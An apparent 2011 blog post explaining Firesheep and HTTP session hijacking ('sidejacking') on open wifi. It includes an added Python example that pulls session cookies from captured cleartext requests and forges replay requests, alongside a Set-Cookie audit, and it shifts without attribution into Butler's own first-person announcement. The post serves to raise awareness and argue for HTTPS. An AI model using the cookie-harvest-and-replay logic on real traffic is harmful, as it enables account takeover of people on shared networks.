Saturday, June 4, 2011

Firesheep: Firefox add-on allows simple HTTP session hijacking


Eric Butler, a freelance web application and software developer, has released a new Firefox add-on over the weekend called Firesheep that aims to highlight the lack of security surrounding user logins and cookies on popular websites such as Facebook.

Firesheep can be added to Firefox just like any other add-on. Once installed it adds a sidebar that lists users who are logged into sites like Facebook over the same unsecured, open network. If a user appears in this sidebar, Firesheep lets you log in as them with a double-click of your mouse. It's that simple.

Firesheep works because of poor security on the part of the website. A user's username and password may be protected with SSL during the login itself, but in many cases the session cookie the site issues after a successful login is sent in the clear on every subsequent request. So once a user has logged in, it is a simple task to capture that unprotected cookie and take over their account for the rest of the session.

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
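The mechanism described above, as an added example that is not part of the original post and not Firesheep's own code: a sniffer sees a cleartext HTTP request on the open network, pulls the session cookie out of the Cookie header (Firesheep calls the per-site list of cookie names a "handler"), and replays it in a request of its own. The hostnames, cookie names and captured requests below are constructed for the example. The second half is the server-side check for the root cause: a session cookie issued without the Secure attribute, which the browser will happily send over plain http://.

```python
"""Sidejacking on plaintext HTTP, plus the Set-Cookie check that catches the cause."""

# Firesheep-style "handlers": the cookie names that carry the login session for
# a given host.  These hostnames and cookie names are constructed assumptions
# for this example, not Firesheep's real handler definitions.
HANDLERS = {
    "social.example": ("sessionid",),
    "mail.example": ("auth_token", "uid"),
}

# Constructed sample of what a capture on an open network might carry: three
# cleartext HTTP requests, two of them to hosts with a handler above.
CAPTURED_REQUESTS = [
    b"GET /home HTTP/1.1\r\n"
    b"Host: social.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: lang=en; sessionid=9f3c7a1e; _tracker=xyz\r\n"
    b"\r\n",
    b"GET /news HTTP/1.1\r\n"
    b"Host: other.example\r\n"
    b"Cookie: visitor=42\r\n"
    b"\r\n",
    b"GET /inbox HTTP/1.1\r\n"
    b"Host: mail.example\r\n"
    b"Cookie: uid=1001; auth_token=deadbeef\r\n"
    b"\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers dict with lowercase names)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(cookie_header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def harvest_sessions(requests):
    """Return (host, session cookies) pairs a sidejacker could reuse, one per complete session."""
    found = []
    for raw in requests:
        _method, _path, headers = parse_request(raw)
        host = headers.get("host", "")
        wanted = HANDLERS.get(host)
        if not wanted or "cookie" not in headers:
            continue
        cookies = parse_cookies(headers["cookie"])
        session = {n: cookies[n] for n in wanted if n in cookies}
        if len(session) == len(wanted):      # only a full set of session cookies is usable
            found.append((host, session))
    return found


def forge_request(host, session, path="/"):
    """Build the request the attacker's browser would send: same cookies, different client."""
    cookie = "; ".join(f"{n}={v}" for n, v in session.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n".encode()


# Server side: the fix is HTTPS for the whole session plus cookies the browser
# refuses to send in the clear.  This flags a Set-Cookie value missing that.
def audit_set_cookie(set_cookie_value):
    """Return the attributes a session cookie needs that this Set-Cookie value lacks."""
    attrs = {a.strip().split("=", 1)[0].lower() for a in set_cookie_value.split(";")[1:]}
    missing = []
    if "secure" not in attrs:
        missing.append("Secure")      # without it the cookie rides along on http:// requests
    if "httponly" not in attrs:
        missing.append("HttpOnly")    # not what a sniffer abuses, but standard for session cookies
    return missing


if __name__ == "__main__":
    for host, session in harvest_sessions(CAPTURED_REQUESTS):
        print(host, session)
        print(forge_request(host, session).decode())
    print(audit_set_cookie("sessionid=9f3c7a1e; Path=/"))
    print(audit_set_cookie("sessionid=9f3c7a1e; Path=/; Secure; HttpOnly"))
```

Running it lists the two hijackable sessions and the forged requests; the request to other.example is ignored because no handler names its session cookie. The audit reports `['Secure', 'HttpOnly']` for the first cookie and nothing for the second. The Secure attribute alone is not enough if the site still serves any page over HTTP, since a plain-HTTP page cannot read a Secure cookie and the user's session simply breaks; the fix the post calls for, HTTPS everywhere, is what makes the Secure cookie workable.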

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.

Today at Toorcon 12 I announced the release of Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.

After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.


As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:


Double-click on someone, and you're instantly logged in as them.


That's it.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.





